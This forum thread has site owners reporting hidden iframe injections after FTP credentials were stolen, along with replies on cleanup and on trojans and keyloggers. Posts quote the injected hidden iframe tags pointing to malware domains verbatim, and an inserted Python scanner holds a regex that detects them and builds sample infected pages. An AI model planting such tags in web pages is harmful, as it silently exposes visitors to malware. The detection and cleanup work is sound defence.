Hello: My website was infected about 3-4 weeks ago. 2 persons told me they got a warning message about malware with a text link to durnosy.com which IS a malware site. The problem is that I never got the warning message and many other people were able to log in without any warnings. In short, some people get the malware message, some don't. This is why it's hard to pinpoint the type of malware. My webmaster was able to download all the files and clean some of the stuff out. We obviously have some type of malware going on. Here's the website: www.memyselfandigifts.com. I really appreciate your help with this!
Because some people have strong antivirus, and some don't have strong (updated) antivirus. I saw this iframe on site . Check it, and remove it from all pages. And some script is running on your site. Double check every folder and file, or contact some expert so he/she can remove it from your site. I can do it for you.
Hi. On Tuesday I browsed to a well-known motorcycle retailer's website. AVG Free told me it had found a virus and I added it to the vault. Yesterday I was horrified to discover that this virus has somehow sent my FTP FileZilla config file to someone and now all of the websites under my control are infected with this: <iframe src="http://durnosy.com/?click=26FA55" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> I have been through most of the sites and removed the above line. (There were also other iframes that were doing the same sort of thing.) The FTP passwords were changed by my boss as he has a Mac and I wasn't sure my machine was safe. It would appear that with the FTP information all the files for each site were downloaded onto the host's computer and the files changed and uploaded back onto the site's domain. I have since got a 12 month subscription to McAfee installed on my laptop. I have been to a site I know is dodgy (I haven't fixed it yet) on two machines, one uses McAfee, one uses AVG Free. Neither AV program highlighted an issue, which is worrying. How do I know if I have removed everything from the domain and my laptop? Is it just the files it changes or does it upload a script to reproduce the changes? Any help would be great as I'm struggling to get my head round this. Thanks, Darren. P.S. What is the script doing?
Are the files on your local computer infected? Maybe your hosting was compromised and is infecting all web files. Try to contact your hosting provider and tell them about your problem.
I got blasted with this on my website too. It took about a week for us to notice and it's taking a while for us to clean it up. It seems to add that iframe code to every page that has the words "index", "main" or "default" in the filename. But each 'click code' is unique so I can't do a mass search and replace. I have to delete and upload manually. I think I have over 200 files infected on my website. I host with A2Hosting. I have no idea how we got infected. And I have no idea what it may have done to people browsing my website. This is the site: http://www.healthyschoolscampaign.org
Our local files were fine. They were infected on the host. Our web host claims that our password must have been compromised. But it's such a weird infection. I just don't get it.
The iframe was stripped and we could not find any scripts in the website. However, I checked the source code this morning and I have another virus: <iframe src="http://vafuiek.com/?click=F34807" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> Is there someone that can help me to scan these files properly and solve this once and for all? I don't feel I have the expertise to do this the right way.
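The posts above report a unique click code per file and a second domain after the first cleanup, which defeats a literal search and replace. As an added example (not code from anyone in this thread), this Python scanner matches the injected tag by its shape instead: a 1x1 hidden iframe whose src ends in ?click=<code>. The function names, the extension list and the sample site built in demo() are assumptions made for the example.

```python
import re
import tempfile
from pathlib import Path

# A 1x1 hidden <iframe> whose src ends in ?click=<code>, whatever the domain or
# click code (the shape of both tags quoted in the thread). Bytes, so files
# are rewritten without any encoding changes.
INJECTED = re.compile(
    rb'<iframe\b(?=[^>]*\bsrc\s*=\s*["\']?https?://[^"\'\s>]+/\?click=[0-9a-z]+)'
    rb'(?=[^>]*\bwidth\s*=\s*["\']?1\b)(?=[^>]*\bheight\s*=\s*["\']?1\b)'
    rb'(?=[^>]*visibility\s*:\s*hidden)[^>]*>\s*</iframe>', re.IGNORECASE)
WEB_SUFFIXES = {".html", ".htm", ".php", ".asp", ".aspx", ".tpl"}  # assumed list
TAG = (b'<iframe src="http://%s/?click=%s" width=1 height=1 '
       b'style="visibility:hidden;position:absolute"></iframe>')  # sample builder


def scan(root):
    """Return {path: [injected tags]} for each web file under root that has one."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_SUFFIXES:
            found = INJECTED.findall(path.read_bytes())
            if found:
                hits[path] = found
    return hits


def clean(root, backup_dir):
    """Copy each infected file to backup_dir (outside the web root), then strip it."""
    hits = scan(root)
    for path in hits:
        data = path.read_bytes()
        saved = Path(backup_dir) / path.relative_to(root)
        saved.parent.mkdir(parents=True, exist_ok=True)
        saved.write_bytes(data)
        path.write_bytes(INJECTED.sub(b"", data))
    return len(hits)


def demo():
    """Constructed sample site: two infected pages and one legitimate embed."""
    legit = b'<iframe src="https://example.com/video" width=560 height=315></iframe>'
    with tempfile.TemporaryDirectory() as tmp:
        site, backup = Path(tmp, "site"), Path(tmp, "backup")
        (site / "sub").mkdir(parents=True)
        (site / "index.html").write_bytes(b"<body>" + TAG % (b"durnosy.com", b"26FA55"))
        (site / "sub" / "main.php").write_bytes(TAG % (b"vafuiek.com", b"F34807") + b"<p>hi</p>")
        (site / "about.html").write_bytes(legit)
        infected = [p.relative_to(site).as_posix() for p in scan(site)]
        cleaned = clean(site, backup)
        return infected, cleaned, len(scan(site)), (site / "about.html").read_bytes() == legit
```

Run scan() again some days after cleaning: a tag that comes back, as in the post above, means the files are still being rewritten from outside.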
From my experience, it is rarely the webhost that is infected. It is the end user's computer, or a computer that the end user has used, that is infected. As DazlerD said, the virus or trojan runs on your computer and looks for your account's username and password and sends that information to hacker groups. These users then log into your account via FTP and download your index pages or other HTML documents, inject iframe or JavaScript code into the pages, and then reupload them to your website. The point here is that you have a virus, trojan, or key logger running on your computer. You need to find this and resolve this issue to prevent the problem from reoccurring. If you clean the files, change your account password, store that new password on your computer (i.e. in your FTP client's site manager or perhaps in your web browser if you save your username and password in the dialog box that asks for your username and password when accessing your control panel) without cleaning the virus/trojan/key logger, then you are just going to have this happen to you again. I would be interested to know if a lot of people that experience this problem are using Internet Explorer or Firefox, or some other web browser, as their primary web browser. Most of the infections that I have seen have come from people that use Internet Explorer as their primary web browser. I'm not sure if there is anything to this or if it is just chance circumstances.
In the future, you should disable write permissions for the entire web directory. Have a separate account for ftp that isn't linked in any way to the account running the site.